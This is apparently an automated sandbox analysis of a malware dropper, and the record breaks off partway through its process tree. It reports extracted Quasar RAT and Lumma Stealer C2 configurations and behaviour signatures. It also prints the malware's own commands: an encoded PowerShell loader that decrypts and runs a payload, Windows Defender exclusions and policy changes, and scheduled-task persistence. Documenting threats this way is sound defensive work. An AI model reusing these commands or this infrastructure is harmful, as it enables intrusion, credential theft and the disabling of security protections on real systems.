Analysis

  • max time kernel
    113s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 10:06

General

  • Target

    vir.exe

  • Size

    36.9MB

  • MD5

    b772bac1d0f1f853c04574fb3b8209ed

  • SHA1

    ceedc9d71c895d2549ddb46deb4f7a7ef58e99bd

  • SHA256

    2c70f7d9578668ea04a218e83fb782a21dd18857812a9c5f041a3a7efa909a88

  • SHA512

    fadbf51c7b45a90f6f0adae0b0373ad29bf8b80ac037693f310d15fde00096d733f0aa372dbe98732a9d0ea1bdf3eff0bc81566b7a79a7708c7dd6593afc51d8

  • SSDEEP

    786432:D4RerlLa3nbEwrkACTe6YQbjGEhM6XHXkvj:kulW3bEoALHUr

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://employhabragaomlsp.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://stalfbaclcalorieeis.shop/api

https://civilianurinedtsraov.shop/api

https://roomabolishsnifftwk.shop/api

Signatures

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 8 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Downloads MZ/PE file
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 11 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 47 IoCs
  • Suspicious use of SendNotifyMessage 43 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3296
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\main.cmd" "
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4664
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im WindowsDefender.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3340
      • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\Rover.exe
        Rover.exe
        3⤵
        • Modifies WinLogon for persistence
        • UAC bypass
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • System policy modification
        PID:2960
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\web.htm
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff86aad46f8,0x7ff86aad4708,0x7ff86aad4718
          4⤵
            PID:4080
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,11696760553021502823,11713128024683695615,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
            4⤵
              PID:4820
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,11696760553021502823,11713128024683695615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3300
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,11696760553021502823,11713128024683695615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
              4⤵
                PID:3144
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,11696760553021502823,11713128024683695615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
                4⤵
                  PID:5004
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,11696760553021502823,11713128024683695615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
                  4⤵
                    PID:1684
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\helper.vbs"
                  3⤵
                    PID:5048
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\spinner.gif
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:2260
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2260 CREDAT:17410 /prefetch:2
                      4⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:4284
                  • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\psiphon3.exe
                    psiphon3.exe
                    3⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:3988
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 1468
                      4⤵
                      • Program crash
                      PID:332
                  • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\regmess.exe
                    regmess.exe
                    3⤵
                    • Executes dropped EXE
                    PID:528
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_6bd311fc-6498-4a74-9d25-fa7dfcb7d327\regmess.bat" "
                      4⤵
                        PID:5132
                        • C:\Windows\SysWOW64\reg.exe
                          reg import Setup.reg /reg:32
                          5⤵
                            PID:5232
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 10
                        3⤵
                        • Delays execution with timeout.exe
                        PID:5184
                      • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\scary.exe
                        scary.exe
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2636
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                          4⤵
                          • Creates scheduled task(s)
                          PID:5864
                        • C:\Program Files\SubDir\Romilyaa.exe
                          "C:\Program Files\SubDir\Romilyaa.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          • Suspicious use of SetWindowsHookEx
                          PID:5664
                          • C:\Windows\SYSTEM32\schtasks.exe
                            "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                            5⤵
                            • Creates scheduled task(s)
                            PID:1236
                      • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\the.exe
                        the.exe
                        3⤵
                        • Executes dropped EXE
                        PID:1084
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                          4⤵
                          • UAC bypass
                          • Windows security bypass
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1284
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\the.exe" -Force
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2520
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                            5⤵
                              PID:5720
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                              5⤵
                              • Drops startup file
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3364
                              • C:\Users\Admin\Pictures\WHKCAYzPoPf6WDgdawJ5VcWq.exe
                                "C:\Users\Admin\Pictures\WHKCAYzPoPf6WDgdawJ5VcWq.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:5556
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 352
                                  7⤵
                                  • Program crash
                                  PID:3532
                              • C:\Users\Admin\Pictures\YtTTKo37vpsPx0pO4OjqNisQ.exe
                                "C:\Users\Admin\Pictures\YtTTKo37vpsPx0pO4OjqNisQ.exe" /s
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Writes to the Master Boot Record (MBR)
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4056
                              • C:\Users\Admin\Pictures\fcFIfrn6NWm2bZ6YxEKoP4Ej.exe
                                "C:\Users\Admin\Pictures\fcFIfrn6NWm2bZ6YxEKoP4Ej.exe"
                                6⤵
                                • Modifies firewall policy service
                                • Windows security bypass
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Windows security modification
                                • Checks whether UAC is enabled
                                • Drops file in System32 directory
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5296
                                • C:\Users\Admin\Documents\SimpleAdobe\_y91qYXRFYT0HMa2vvKQo0Sx.exe
                                  C:\Users\Admin\Documents\SimpleAdobe\_y91qYXRFYT0HMa2vvKQo0Sx.exe
                                  7⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Accesses Microsoft Outlook profiles
                                  • Adds Run key to start application
                                  • Checks processor information in registry
                                  • outlook_office_path
                                  • outlook_win_path
                                  PID:4396
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
                                    8⤵
                                    • Creates scheduled task(s)
                                    PID:2264
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
                                    8⤵
                                    • Creates scheduled task(s)
                                    PID:4992
                                  • C:\Users\Admin\AppData\Local\Temp\spannBrWxzmtCXBG\0PUfsgKxnGCollTZhCjT.exe
                                    "C:\Users\Admin\AppData\Local\Temp\spannBrWxzmtCXBG\0PUfsgKxnGCollTZhCjT.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1564
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      9⤵
                                        PID:5028
                                • C:\Users\Admin\Pictures\u1OPUYKu3USYyZcC2mvAJjEP.exe
                                  "C:\Users\Admin\Pictures\u1OPUYKu3USYyZcC2mvAJjEP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5836
                                  • C:\Users\Admin\AppData\Local\Temp\7zS5C54.tmp\Install.exe
                                    .\Install.exe /odidum "385118" /S
                                    7⤵
                                    • Checks BIOS information in registry
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Enumerates system info in registry
                                    PID:2168
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      8⤵
                                        PID:1328
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          9⤵
                                            PID:3784
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              10⤵
                                                PID:3076
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  11⤵
                                                    PID:6052
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                9⤵
                                                  PID:5644
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    10⤵
                                                      PID:4916
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        11⤵
                                                          PID:3296
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                      9⤵
                                                        PID:5128
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                          10⤵
                                                            PID:5576
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              11⤵
                                                                PID:1712
                                                          • C:\Windows\SysWOW64\forfiles.exe
